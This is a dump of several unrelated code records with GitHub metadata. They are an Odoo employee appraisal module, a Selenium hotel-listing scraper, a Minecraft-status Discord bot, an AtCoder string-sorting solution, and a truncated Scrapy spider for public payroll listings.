self.env['res.users'].browse([self.directed_user_id.id])\r\n supervisor = current_user.has_group(\"maach_hr_appraisal.group_supervisor\")\r\n manager = current_user.has_group(\"maach_hr_appraisal.group_appraisal_manager_id\")\r\n if supervisor:\r\n self.appraisal_with_hr_supervisor = True\r\n\r\n if manager:\r\n self.appraisal_with_hr_manager = True\r\n else:\r\n self.appraisal_with_hr_manager = False\r\n self.appraisal_with_hr_supervisor = False\r\n\r\n def action_rejected(self):\r\n if not self.employee_id.user_id.id == self.env.uid:\r\n raise ValidationError('Sorry!!! you are only allowed to reject your own approved Appraisal')\r\n self.acceptance_status = 'Rejected'\r\n\r\n def action_accepted(self):\r\n if not self.employee_id.user_id.id == self.env.uid:\r\n raise ValidationError('Sorry!!! you are only allowed to accept your own approved Appraisal')\r\n self.acceptance_status = 'Accepted'\r\n\r\n def _check_validation(self):\r\n if self.deadline:\r\n if fields.Date.today() > self.appraisal_config_id.deadline:\r\n raise ValidationError(\"You are not allowed to submit because the deadline has exceeded !!!\")\r\n\r\n def _message_post(self, template):\r\n \"\"\"Wrapper method for message_post_with_template\r\n Args:\r\n template (str): email template\r\n \"\"\"\r\n if template:\r\n ir_model_data = self.env['ir.model.data']\r\n template_id = ir_model_data.get_object_reference('maach_hr_appraisal', template)[1]\r\n self.message_post_with_template(\r\n template_id, composition_mode='comment',\r\n model='{}'.format(self._name), res_id=self.id,\r\n email_layout_xmlid='mail.mail_notification_light',\r\n )\r\n\r\n @api.depends('deadline')\r\n def _compute_days_remaining(self):\r\n for rec in self:\r\n if rec.deadline:\r\n now = fields.Date.today()\r\n # deadline = datetime.strptime(\r\n # rec.deadline, '%Y-%m-%d')\r\n difference = self.deadline - now\r\n rec.days_remaining = difference.days\r\n\r\n else:\r\n rec.days_remaining = False \r\n\r\n @api.depends('appraisal_config_id')\r\n def get_appraisal_deadline(self):\r\n for rec in self:\r\n if rec.appraisal_config_id:\r\n rec.deadline = rec.appraisal_config_id.deadline\r\n else:\r\n rec.deadline = False\r\n\r\n @api.depends('kpi_assessment_lines')\r\n def _compute_assessment_score(self):\r\n for rec in self:\r\n # balance_tasks = rec.mapped('kpi_assessment_lines').filtered(lambda x: x.kpi_topic_id.template_id.is_attitude_appraisal == False)\r\n balance_tasks = rec.mapped('kpi_assessment_lines').filtered(lambda x: x.kpi_topic_id.is_attitude_appraisal == False)\r\n balance_total = sum([it.total_percentage for it in balance_tasks])\r\n rec.balance_score = balance_total * 0.6\r\n\r\n attitude_tasks = rec.mapped('kpi_assessment_lines').filtered(lambda x: x.kpi_topic_id.is_attitude_appraisal == True)\r\n attitude_total = sum([it.total_percentage for it in attitude_tasks])\r\n rec.attitude_appraisal_score = (attitude_total / 100) * 40\r\n\r\n @api.onchange('balance_score', 'attitude_appraisal_score')\r\n def _compute_overall_total(self):\r\n for rec in self:\r\n tasks = rec.mapped('kpi_assessment_lines')\r\n total = sum([it.total_percentage for it in tasks])\r\n scores = rec.balance_score + rec.attitude_appraisal_score\r\n total = scores\r\n rec.overall_total = total # if not rec.attitude_appraisal_score else total\r\n\r\n # @api.depends('overall_total')\r\n def _compute_result(self):\r\n for rec in self:\r\n number_queries_warning = (rec.number_queries * 5) + (rec.number_warning * 3)\r\n total = rec.overall_total - number_queries_warning\r\n self.total_score = total\r\n result_domain = [('min_range', '<=', total), ('max_range', '>=', total)]\r\n result_config = self.env['usl.appraisal.result.config'].search(result_domain, limit=1)\r\n if result_config:\r\n rec.result_description = result_config.description\r\n rec.result = result_config.result\r\n rec.performance_band = result_config.performance_band\r\n\r\n def action_set_progress(self):\r\n self.state = \"In Progress\"\r\n\r\n def action_cancel(self):\r\n self.state = \"Cancel\"\r\n\r\n def action_set_draft(self):\r\n self.state = \"Draft\"\r\n\r\n def get_url(self, id, name):\r\n base_url = http.request.env['ir.config_parameter'].sudo().get_param('web.base.url')\r\n base_url += '/web#id=%d&view_type=form&model=%s' % (id, name)\r\n return \" Click. \".format(base_url)\r\n\r\n def action_confirm(self):\r\n if self.employee_id.user_id.id == self.env.uid:\r\n raise ValidationError('Sorry!!! you are not allow to approve your Appraisal')\r\n curr_emp_user = self.env['hr.employee'].search([('user_id', '=', self.env.uid)], limit=1)\r\n self.set_approvers(curr_emp_user)\r\n subject = \"Appraisal Notification\"\r\n email_to = self.employee_id.work_email\r\n email_cc = [rec.work_email for rec in self.approver_ids]\r\n msg = \"Dear {},
I wish to notify you that an appraisal with description, {} \\\r\n by {} has been approved.

Kindly {} to review
\\\r\n Yours Faithfully
{}\".format(\r\n self.employee_id.name,\r\n self.sequence, self.employee_id.name,\r\n self.get_url(self.id, self._name),\r\n self.env.user.name)\r\n self.action_notify(subject, msg, email_to, email_cc)\r\n self.state = \"Done\"\r\n self._compute_result()\r\n\r\n def set_approvers(self, empID=False):\r\n if self.env.uid != self.employee_id.user_id.id:\r\n curr_emp_user = self.env['hr.employee'].search([('user_id', '=', self.env.user.id)], limit=1)\r\n if not empID:\r\n raise ValidationError('No employee to direct to')\r\n self.approver_ids = [(6, 0, [empID.id, curr_emp_user.id])]\r\n dir_userid = self.env['hr.employee'].search([('id', '=', empID.id)], limit=1)\r\n self.directed_user_id = dir_userid.user_id.id\r\n self.state = \"In progress\"\r\n\r\n def action_notify(self, subject, msg, email_to, email_cc):\r\n subject = subject\r\n email_from = self.env.user.email\r\n email_ccs = list(filter(bool, email_cc))\r\n reciepients = (','.join(items for items in email_ccs)) if email_ccs else False\r\n mail_data = {\r\n 'email_from': email_from,\r\n 'subject': subject,\r\n 'email_to': email_to,\r\n 'reply_to': email_from,\r\n 'email_cc': reciepients,\r\n 'body_html': msg\r\n }\r\n mail_id = self.env['mail.mail'].sudo().create(mail_data)\r\n self.env['mail.mail'].sudo().send(mail_id)\r\n self.message_post(body=msg)\r\n\r\n def stat_button_query(self):\r\n pass\r\n\r\n def stat_button_number_commendation(self):\r\n pass\r\n\r\n def stat_button_warning(self):\r\n pass\r\n\r\n def stat_button_absent(self):\r\n pass\r\n\r\n def stat_button_total_appraisal(self):\r\n pass\r\n\r\n def withdraw_appraisal_action(self):\r\n self.directed_user_id = False # self.env.user.id\r\n\r\n def forward_action(self):\r\n self._check_validation()\r\n dummy, view_id = self.env['ir.model.data'].get_object_reference('maach_hr_appraisal', 'memo_hr_appraisal_model_forward_wizard')\r\n return {\r\n 'name': 'Forward',\r\n 'view_type': 'form',\r\n 'view_id': view_id,\r\n \"view_mode\": 'form',\r\n 'res_model': 'memo.appraisal.foward.wizard',\r\n 'type': 'ir.actions.act_window',\r\n 'target': 'new',\r\n 'context': {\r\n 'default_memo_record': self.id,\r\n 'default_resp': self.env.uid,\r\n 'default_type': \"forward\",\r\n 'default_directed_user_id': self.employee_id.department_id.manager_id.user_id.id or self.employee_id.parent_id.user_id.id,\r\n },\r\n }\r\n\r\n def return_action(self):\r\n dummy, view_id = self.env['ir.model.data'].get_object_reference('maach_hr_appraisal', 'memo_hr_appraisal_model_forward_wizard')\r\n return {\r\n 'name': 'Return',\r\n 'view_type': 'form',\r\n 'view_id': view_id,\r\n \"view_mode\": 'form',\r\n 'res_model': 'memo.appraisal.foward.wizard',\r\n 'type': 'ir.actions.act_window',\r\n 'target': 'new',\r\n 'context': {\r\n 'default_memo_record': self.id,\r\n 'default_type': \"return\",\r\n 'default_resp': self.env.uid,\r\n },\r\n }\r\n\r\n def add_queries(self):\r\n '''This increment number of queries by 1 and also deducts 5 from the overall total which\r\n affects the perfomance bond / result\r\n '''\r\n self.number_queries = self.number_queries + 1\r\n\r\n def remove_queries(self):\r\n '''This decrement number of queries by 1\r\n '''\r\n if self.number_queries > 0:\r\n self.number_queries = self.number_queries - 1\r\n\r\n def add_warning(self):\r\n '''This increment number of warnings by 1 and also deducts 3 from the overall total which\r\n affects the perfomance bond / result\r\n '''\r\n self.number_warning = self.number_warning + 1\r\n\r\n def remove_warning(self):\r\n if self.number_warning > 0:\r\n self.number_warning = self.number_warning - 1\r\n\r\n @api.model\r\n def fields_view_get(self, view_id='maach_hr_appraisal.usl_employee_appraisal_form_view', view_type='form', toolbar=False, submenu=False):\r\n res = super(HrEmployeeAppraisal, self).fields_view_get(view_id=view_id,\r\n view_type=view_type,\r\n toolbar=toolbar,\r\n submenu = submenu)\r\n doc = etree.XML(res['arch'])\r\n for rec in self: #.approver_ids:\r\n if rec.directed_user_id.id == self.env.uid:\r\n for node in doc.xpath(\"//button[@name='forward_action']\"):\r\n node.set('modifiers', '{\"invisible\": false}')\r\n\r\n if rec.employee_id.user_id.id == self.env.uid:\r\n for node in doc.xpath(\"//button[@name='return_action']\"):\r\n node.set('modifiers', '{\"invisible\": true}')\r\n\r\n for node in doc.xpath(\"//button[@name='withdraw_appraisal_action']\"):\r\n node.set('modifiers', '{\"invisible\": true}')\r\n\r\n res['arch'] = etree.tostring(doc)\r\n return res\r\n\r\n def unlink(self):\r\n for record in self.filtered(lambda record: record.state not in ['Draft','Cancel']):\r\n raise ValidationError(_('In order to delete an Appraisal, you must cancel it first...'))\r\n return super(HrEmployeeAppraisal, self).unlink()\r\n \r\n def write(self, vals):\r\n \"\"\"\r\n Any time an approver changes this options, \r\n the system adds 1 if True else deducts 1\r\n This is used to count the number of queries, \r\n warning by any approver\r\n \"\"\"\r\n # for rec in self:\r\n # self.validate_user_edit()\r\n res = super(HrEmployeeAppraisal, self).write(vals)\r\n if 'queried' in vals and vals.get('queried') == True:\r\n self.update({'number_queries': self.number_queries + 1})\r\n if 'warned' in vals and vals.get('warned') == True:\r\n self.update({'number_warning': self.number_warning + 1})\r\n if 'commendation' in vals and vals.get('commendation') == True:\r\n self.update({'number_commendation': self.number_commendation + 1})\r\n if 'absent' in vals and vals.get('absent') == True:\r\n self.update({'number_absent': self.number_absent + 1})\r\n return res\r\n\r\n","repo_name":"madux/usil-erp","sub_path":"maach_hr_appraisal/models/employee_appraisee.py","file_name":"employee_appraisee.py","file_ext":"py","file_size_in_byte":18838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1477653863","text":"import copy\nimport datetime\nimport json\nimport os\nimport re\nimport subprocess\nimport concurrent.futures\nimport sys\nimport traceback\nfrom urllib.parse import urlencode, urlparse, parse_qs, urlunparse\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport threading\nimport time\nimport logging\n\n# Настроки\nsimultaneous_parsing = 3\n\nclass MyLog:\n logger : logging.Logger\n\n def __init__(self, id) -> None:\n self.logger = self.create_logger(id)\n # subprocess.Popen(['python', 'print_log.py', f'r_logs/logger_{id}.log'], stdin=subprocess.PIPE)\n\n def create_logger(self, id):\n # создаем логгер\n logger = logging.getLogger(f\"logger_{id}\")\n handler = logging.FileHandler(filename=f'r_logs/logger_{id}.log', mode='w', encoding='utf-8')\n handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n\n return logger\n\n def log(self, mes):\n self.logger.info(mes)\n\ndef split_list(lst, n):\n \"\"\"\n Разделение списка на n подсписков примерно равной длины\n \"\"\"\n size = len(lst) // n\n remainder = len(lst) % n\n result = []\n start = 0\n for i in range(n):\n end = start + size + (i < remainder)\n result.append(lst[start:end])\n start = end\n return result\n\ndef update_query_params(url, new_values):\n parsed_url = urlparse(url)\n query_dict = parse_qs(parsed_url.query)\n\n for key, value in new_values.items():\n query_dict[key] = value\n\n new_query = urlencode(query_dict, doseq=True)\n updated_url = urlunparse((parsed_url.scheme, parsed_url.netloc,\n parsed_url.path, parsed_url.params, new_query, parsed_url.fragment))\n\n return updated_url\n\ndef create_webdriver():\n # Create a new instance of the Chrome driver\n chrome_options = webdriver.ChromeOptions()\n\n # Отключение загрузки картинок\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chrome_options.add_experimental_option(\"prefs\", prefs)\n\n # Отключение загрузки шрифтов и css\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-infobars')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-setuid-sandbox')\n chrome_options.add_argument('--disable-web-security')\n chrome_options.add_argument('--disable-features=VizDisplayCompositor')\n chrome_options.add_argument('--disable-logging')\n chrome_options.add_argument('--disable-logging-redirect')\n chrome_options.add_argument('--disable-background-networking')\n chrome_options.add_argument('--disable-breakpad')\n chrome_options.add_argument('--disable-client-side-phishing-detection')\n chrome_options.add_argument('--disable-component-update')\n chrome_options.add_argument('--disable-default-apps')\n chrome_options.add_argument('--disable-extensions-http-throttling')\n chrome_options.add_argument('--disable-extensions-file-access-check')\n chrome_options.add_argument('--disable-extensions-scheme-whitelist')\n chrome_options.add_argument('--disable-hang-monitor')\n chrome_options.add_argument('--disable-ipc-flooding-protection')\n chrome_options.add_argument('--disable-popup-blocking')\n chrome_options.add_argument('--disable-prompt-on-repost')\n chrome_options.add_argument('--disable-renderer-backgrounding')\n chrome_options.add_argument('--disable-sync')\n chrome_options.add_argument('--disable-translate')\n chrome_options.add_argument('--metrics-recording-only')\n chrome_options.add_argument('--mute-audio')\n chrome_options.add_argument('--no-first-run')\n chrome_options.add_argument('--safebrowsing-disable-auto-update')\n chrome_options.add_argument('--start-maximized')\n chrome_options.add_argument('--disable-webgl')\n chrome_options.add_argument('--disable-threaded-animation')\n chrome_options.add_argument('--disable-threaded-scrolling')\n chrome_options.add_argument('--disable-web-security')\n chrome_options.add_argument('--disable-xss-auditor')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--ignore-certificate-errors')\n # chrome_options.add_argument('--headless')\n chrome_options.add_argument('--disk-cache=true')\n chrome_options.add_argument('--log-level=3')\n\n driver = webdriver.Chrome(chrome_options=chrome_options)\n\n # driver.request_interceptor = interceptor\n\n return driver\n\ndrivers = [create_webdriver() for i in range(simultaneous_parsing)]\n\ndef parser_hotel_rooms(url, driver, logger : MyLog):\n return_urls = []\n dates = [\n [\"28.07.2023-01.08.2023\", 4],\n [\"28.08.2023-01.09.2023\", 4],\n [\"05.10.2023-08.10.2023\", 3]\n ]\n\n retrun_rooms: dict[str, dict[str, list]] = {}\n\n additional_values = None\n\n operation_counter = 0\n operation_counter_max = 3 * 4\n\n for date, days in dates:\n for guests in range(1, 5):\n url = update_query_params(url, {\"dates\": date, \"guests\": guests})\n return_urls.append(url)\n operation_counter += 1\n\n if additional_values == None:\n additional_values, rooms = parser_room(\n url, driver, True, date, days, guests)\n else:\n _, rooms = parser_room(url, driver, False, date, days, guests)\n\n logger.log(f\"[{operation_counter}/{operation_counter_max}] {date} | {guests} => {len(rooms)}\")\n # logging.info(f\"[{operation_counter}/{operation_counter_max}] {date} | {guests} => {len(rooms)}\")\n\n for key, val in rooms.items():\n if not retrun_rooms.get(key):\n retrun_rooms[key] = {\n \"price\": [],\n \"amenity\": None,\n \"search\": [],\n }\n\n retrun_rooms[key][\"price\"].append(val[\"price\"])\n retrun_rooms[key][\"search\"].append(val[\"search\"])\n\n if retrun_rooms[key][\"amenity\"] == None:\n retrun_rooms[key][\"amenity\"] = val[\"amenity\"]\n\n # [Название] Цена | Гостей => Количество захваченных поисков\n logger.log(f\"Информация об номерах [{len(retrun_rooms)}]:\")\n for key, val in retrun_rooms.items():\n prices = [round(price[\"price\"] / price[\"days\"])\n for price in val[\"price\"]]\n max_price = max(prices)\n\n guests = [search[\"guests\"] for search in val[\"search\"]]\n max_guest = max(guests)\n\n logger.log(f\"[{key}] ↑{max_price} | ↑{max_guest} => s{len(val['search'])}\")\n\n return retrun_rooms, additional_values, return_urls\n\ndef parser_room(url, driver, get_additional_values: bool, date, days, guests):\n rooms: dict[str, list] = {}\n\n additional_values = None\n\n driver.get(url)\n\n # ждем полной загрузки страницы\n driver.execute_script(\"return document.readyState\")\n\n scripts = driver.find_elements(\n \"xpath\", \"//script[@type='text/javascript']\")\n\n for script in scripts:\n try:\n driver.execute_script(script.get_attribute('innerHTML'))\n except:\n pass\n\n if additional_values == None:\n additional_values = {}\n try:\n title_stars = driver.find_element(\n By.CLASS_NAME, \"zen-roomspage-title-stars\")\n stars = title_stars.find_elements(\n By.CLASS_NAME, \"zen-ui-stars-star\")\n additional_values[\"stars_count\"] = len(stars)\n except:\n additional_values[\"stars_count\"] = 0\n\n try:\n span_time_in_out = driver.find_elements(\n By.CLASS_NAME, \"PolicyBlock__policyTableCell_checkInCheckOut--sezvV\")\n\n for obj in span_time_in_out:\n if obj.text.startswith(\"После\"):\n additional_values[\"time_in\"] = obj.text.replace(\n \"После\", \"\").strip()\n if obj.text.startswith(\"До\"):\n additional_values[\"time_out\"] = obj.text.replace(\n \"До\", \"\").strip()\n pass\n except:\n additional_values[\"time_in\"] = \"12:00\"\n additional_values[\"time_out\"] = \"14:00\"\n\n additional_values[\"title\"] = driver.title\n\n try:\n # Ожидание появления элемента с классом zenroomspage-b2c-rates\n rates = WebDriverWait(driver, timeout=3).until(\n lambda d: d.find_elements(By.CLASS_NAME, \"zenroomspage-b2c-rates\"))\n except:\n rates = []\n\n for rate in rates:\n name = rate.find_element(\n By.CLASS_NAME, \"zenroomspagerate-name-title\").text\n name = name.replace(\"\\n\", \" \")\n\n if not rooms.get(name):\n rooms[name] = {\n \"price\": None,\n \"amenity\": [],\n \"search\": None,\n }\n\n rooms[name][\"search\"] = {\n \"date\": {\"start\": date, \"days\": days}, \"guests\": guests}\n\n price = rate.find_elements(\n By.CLASS_NAME, \"zenroomspage-b2c-rates-price-amount\")[0].text\n price = int(price.replace(\" \", \"\").replace(\"₽\", \"\"))\n\n rooms[name][\"price\"] = {\"price\": price, \"days\": days}\n\n if len(rooms[name][\"amenity\"]) == 0:\n amenitys = rate.find_elements(\n By.CLASS_NAME, \"zenroomspageroom-header-content-amenity\")\n for amenity in amenitys:\n text_amenity = amenity.text\n rooms[name][\"amenity\"].append(text_amenity)\n\n return additional_values, rooms\n\ndef get_hotel(url_hotel, hotel_id, driver, logger : MyLog):\n start_time = int(time.time())\n\n url = \"https://ostrovok.ru/hotel/search/v2/site/hp/content\"\n params = {\n \"lang\": \"ru\",\n \"hotel\": hotel_id,\n }\n\n response = requests.get(url, params=params)\n json_data = response.json()\n\n amenities = {}\n\n for group in json_data[\"data\"][\"hotel\"][\"amenity_groups_v2\"]:\n category = group[\"group_name\"]\n amenities[category] = []\n for amenity in group[\"amenities\"]:\n name = amenity[\"name\"]\n amenities[category].append(name)\n\n address_parts = json_data[\"data\"][\"hotel\"][\"address\"].split(', ')\n street = address_parts[0]\n house_number = address_parts[1]\n city = json_data[\"data\"][\"hotel\"][\"city\"]\n country = json_data[\"data\"][\"hotel\"][\"country\"]\n\n description = json_data[\"data\"][\"hotel\"][\"description\"]\n\n images = []\n\n for img in json_data[\"data\"][\"hotel\"][\"images\"]:\n w = img[\"width\"]\n h = img[\"height\"]\n\n url: str = img[\"tmpl\"]\n\n url = url.replace(\"{size}\", \"1024x768\")\n\n images.append({\n \"url\": url,\n })\n\n latitude = json_data[\"data\"][\"hotel\"][\"latitude\"]\n longitude = json_data[\"data\"][\"hotel\"][\"longitude\"]\n\n name = json_data[\"data\"][\"hotel\"][\"name\"]\n\n rooms_data_parser_selenium, additional_data, return_urls = parser_hotel_rooms(\n url_hotel, driver, logger)\n\n rooms = []\n\n room_groups = json_data[\"data\"][\"hotel\"][\"room_groups\"]\n\n for room in room_groups:\n if not rooms_data_parser_selenium.get(room[\"name\"]):\n continue\n\n date_room = {\n \"name\": room[\"name\"],\n \"size\": room.get(\"size\"),\n \"amenitie\": [item for item in rooms_data_parser_selenium[room[\"name\"]][\"amenity\"]],\n \"search\": rooms_data_parser_selenium[room[\"name\"]][\"search\"],\n \"visibility_area\": {\n \"date\": [],\n },\n \"rg_hash\": room[\"rg_hash\"],\n }\n\n days_list = [search[\"date\"][\"days\"]\n for search in rooms_data_parser_selenium[room[\"name\"]][\"search\"]]\n guests = {\n \"max\": max(days_list) if days_list else None,\n \"min\": min(days_list) if days_list else None,\n }\n\n days_list = [search[\"date\"][\"days\"]\n for search in rooms_data_parser_selenium[room[\"name\"]][\"search\"]]\n days = {\n \"max\": max(days_list) if days_list else None,\n \"min\": min(days_list) if days_list else None,\n }\n\n guests_list = [search[\"guests\"]\n for search in rooms_data_parser_selenium[room[\"name\"]][\"search\"]]\n guests = {\n \"max\": max(guests_list) if guests_list else None,\n }\n\n date_room[\"visibility_area\"][\"days\"] = days\n date_room[\"visibility_area\"][\"guests\"] = guests\n\n date_room[\"imgs\"] = []\n if rooms_data_parser_selenium.get(room[\"name\"]):\n date_room[\"price\"] = rooms_data_parser_selenium[room[\"name\"]][\"price\"]\n else:\n date_room[\"price\"] = 0\n\n for img in room[\"image_list_tmpl\"]:\n w = img[\"width\"]\n h = img[\"height\"]\n\n url: str = img[\"src\"]\n\n url = url.replace(\"{size}\", \"1024x768\")\n\n date_room[\"imgs\"].append({\n \"url\": url,\n \"size\": f\"{w}x{h}\",\n })\n\n rooms.append(date_room)\n\n end_time = int(time.time())\n\n hotel_data = {\n \"debug\": {\n \"start_time\": datetime.datetime.fromtimestamp(start_time).strftime(\"%d.%m.%Y %H:%M:%S\"),\n \"end_time\": datetime.datetime.fromtimestamp(end_time).strftime(\"%d.%m.%Y %H:%M:%S\"),\n \"d_time_m\": f\"{round((end_time - start_time) / 60, 1)} минут\",\n \"d_time_s\": f\"{(end_time - start_time)} секунд\",\n },\n \"urls\": return_urls,\n \"name_hotel\": name,\n \"address\": {\n \"street\": street,\n \"house\": house_number,\n \"city\": city,\n \"continent\": country,\n },\n \"description\": description,\n \"images\": images,\n \"coordinates\": {\n \"latitude\": latitude,\n \"longitude\": longitude,\n },\n \"description\": description,\n \"services\": amenities,\n \"rooms\": rooms,\n }\n\n hotel_data.update(additional_data)\n\n logger.log(f\"Скачался за {hotel_data['debug']['d_time_s']}\")\n\n return hotel_data\n\nurls = []\n\n# cities = {}\n# with open(\"slug.json\", encoding='utf-8') as f:\n# data = json.load(f)\n# for slug in data:\n# slug: str\n# city = slug.split(\"/\")[1]\n# cities[city] = slug\n\n\nif not os.path.exists(\"hotels/empty/\"):\n os.mkdir(\"hotels/empty/\")\n\nif not os.path.exists(\"hotels/normal/\"):\n os.mkdir(\"hotels/normal/\")\n\nthere_are_already_hotels = []\n\nfor filename in os.listdir('hotels'):\n if filename.endswith('.json'):\n there_are_already_hotels.append(filename.split(\".\")[0])\n\n\nfull_count_hotel = 0\n\n# Цикл для чтения каждого файла в папке\nfor filename in os.listdir('cities/full'):\n if filename.endswith('.json'):\n with open(os.path.join('cities/full', filename), encoding='utf-8') as f:\n data = json.load(f)\n index, city = filename.split(\"_\", 1)\n city = city.replace(\".json\", \"\")\n\n for hotel in data[\"hotels\"]:\n full_count_hotel += 1\n slug = f\"russia/{city}\"\n if city not in there_are_already_hotels:\n obj = {\n \"city\": city,\n \"url\": f\"https://ostrovok.ru/hotel/{slug}/mid9287753/{hotel['ota_hotel_id']}/?dates=20.09.2023-29.09.2023&guests=1\",\n \"id_hotel\": hotel['ota_hotel_id']\n }\n urls.append(obj)\n\nindex_urls = 0\n\n\ndef find_files(path, extension):\n list = []\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(extension):\n list.append(file.split(\".\")[0])\n\n return list\n\n\nthere_are_already_hotels = find_files(\"hotels\", '.json')\n\nprint(f\"Всего отелей {full_count_hotel}, уже скачено {len(there_are_already_hotels)}, нужно ещё {len(urls)} скачать\")\n\nif not os.path.exists(\"r_logs/\"):\n os.mkdir(\"r_logs/\")\n\ndef while_hotel(urls, id, mixing_id, there_are_already_hotels, driver):\n \"\"\"Основной цикт получения отелей\n\n Args:\n `urls` (list): Список с url и slug\\n\n `id` (int): ID цикла\\n\n `mixing_id` (int): Смешение вывода index_urls\\n\n `there_are_already_hotels` (list): Отели который уже скачены\n \"\"\"\n logger = MyLog(id)\n index_urls = 0\n while index_urls < len(urls):\n try:\n url = urls[index_urls]\n\n if url[\"id_hotel\"] in there_are_already_hotels:\n index_urls += 1\n logger.log(f\"[{index_urls+mixing_id}/{len(urls)+mixing_id}] {url['id_hotel']} уже есть\")\n # logger.log(f\"[{index_urls+mixing_id}/{len(urls)}] {url['id_hotel']} уже есть\")\n continue\n\n logger.log(f\"[{index_urls+mixing_id+1}/{len(urls)+mixing_id}] {url['city']} => {url['id_hotel']} скачивается\")\n # logger.log(\n # f\"[{index_urls+mixing_id+1}/{len(urls)+mixing_id}] {url['city']} => {url['id_hotel']} скачивается\")\n\n data = get_hotel(url[\"url\"], url[\"id_hotel\"], driver, logger)\n\n index_urls += 1\n\n if len(data[\"rooms\"]) == 0:\n path_dir = f\"hotels/empty/{url['city']}/\"\n else:\n path_dir = f\"hotels/normal/{url['city']}/\"\n\n if not os.path.exists(path_dir):\n os.mkdir(path_dir)\n\n with open(os.path.join(path_dir, f\"{url['id_hotel']}.json\"), 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False)\n logger.log(f\"{os.path.join(path_dir, url['id_hotel'] + '.json')} записан в файл\")\n # logger.log(f\"{url['id_hotel']} записан в файл\")\n except:\n error_type, error_value, tb = sys.exc_info()\n traceback_msg = \"\".join(traceback.format_tb(tb))\n error = f\"{error_type.__name__} - {error_value}\\n {traceback_msg}\"\n # logger.log(error)\n logger.log(error)\n\nsplitted_url = split_list(urls, simultaneous_parsing)\n\nwith concurrent.futures.ThreadPoolExecutor(max_workers=simultaneous_parsing) as executor:\n futures = [executor.submit(while_hotel, splitted_url[i], i, round(i*(len(urls) / simultaneous_parsing)), there_are_already_hotels, drivers[i]) for i in range(simultaneous_parsing)]\n","repo_name":"KDragonic/HotelBase","sub_path":"p_hotel.py","file_name":"p_hotel.py","file_ext":"py","file_size_in_byte":18962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31979477775","text":"import discord\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import Bot\nimport json\nimport platform\nimport random\nimport sys\nimport os\nfrom mcstatus import MinecraftServer\n\nif not os.path.isfile(\"config.json\"):\n sys.exit(\"'config.json' not found! Please add it and try again.\")\nelse:\n with open(\"config.json\") as file:\n config = json.load(file)\n\ndescription = '''An early version of the new Discord bot for Cataclysm'''\n\nbot = commands.Bot(command_prefix=config[\"bot_prefix\"], description=description)\n\nmcServer = MinecraftServer.lookup(config[\"minecraft_server_address\"])\n\n@bot.event\nasync def on_ready():\n print('Logged in as {bot.user} (ID: {bot.user.id})')\n\n@bot.command()\nasync def add(ctx, left: int, right: int):\n\tawait ctx.send(left + right)\n\n@bot.command()\nasync def status(ctx):\n\tstatus = mcServer.status()\n\ttry:\n\t\tstatus = mcServer.status()\n\t\tawait ctx.send(\"There are {0} players online\".format(status.players.online))\n\texcept:\n\t\tawait ctx.send(\"Error reaching the server\")\n\n\n\nbot.run(config[\"token\"])\n","repo_name":"ian-pitman/Catabot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71595587764","text":"x=input()\nn=int(input())\na='abcdefghijklmnopqrstuvwxyz'\nd={i:j for i,j in zip(x,a)} # 対応表\nsl=[]\nfor _ in range(n):\n s=input()\n t=''.join([d[c] for c in s])\n sl.append((t,s))\nsl.sort()\nfor s in sl:\n print(s[1])\n","repo_name":"ymsk-sky/atcoder","sub_path":"abc219/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18269387136","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport os\n\nclass crawler(scrapy.Spider):\n name=\"openPayrollCrawler\"\n EMPLOYEE_ROW_CSS = \"tr[itemprop='employee']\"\n EMPLOYEE_NAME_CSS = \"span[itemprop='name']::text\"\n EMPLOYEE_NEXT_BUTTON_XPATH = '//a[@rel=\"next\"]/@href'\n EMPLOYEE_DETAIL_BUTTON = \":last-child>a::attr(href)\"\n EMPLOYEE_DETAIL_NAME = \"h1>span[itemprop='name']::text\"\n EMPLOYEE_DETAIL_TITLE = \"span[itemprop='jobTitle']::text\"\n EMPLOYEE_DETAIL_SALARY = \"span[data-toggle='popover']::text\"\n\n def __init__(self, location, file_out = \"data.csv\"):\n self.start_urls = [f\"https://openpayrolls.com/search/employees/{location}\"]\n open(file_out, 'w+').close() # Create the file, clear it if it already exists\n self.file_out = file_out\n \n\n def parse(self, response):\n for emp in response.css(self.EMPLOYEE_ROW_CSS):\n print(f\"Parsing: {emp.css(self.EMPLOYEE_NAME_CSS).get()}\")\n link = emp.css(self.EMPLOYEE_DETAIL_BUTTON).extract()[0]\n print(link)\n yield response.follow(response.urljoin(link), callback=self.parse_details)\n print(\"Following link\")\n link = emp.xpath(self.EMPLOYEE_NEXT_BUTTON_XPATH).extract()[0]\n print(link)\n yield response.follow(response.urljoin(link), callback=self.parse)\n\n def parse_details(self, response):\n print(\"PARSING DETAILS\")\n with open(self.file_out, 'a') as f:\n f.write(response.css(self.EMPLOYEE_DETAIL_NAME).get().replace(\",\",'&c;') + ',')\n f.write(response.css(self.EMPLOYEE_DETAIL_TITLE).get().replace(\",\",'&c;') + ',')\n f.write(response.css(self.EMPLOYEE_DETAIL_SALARY).get().replace(\",\",'') + '\\n')\n \nif __name__ == \"__main__\":\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n\n process.crawl(crawler, 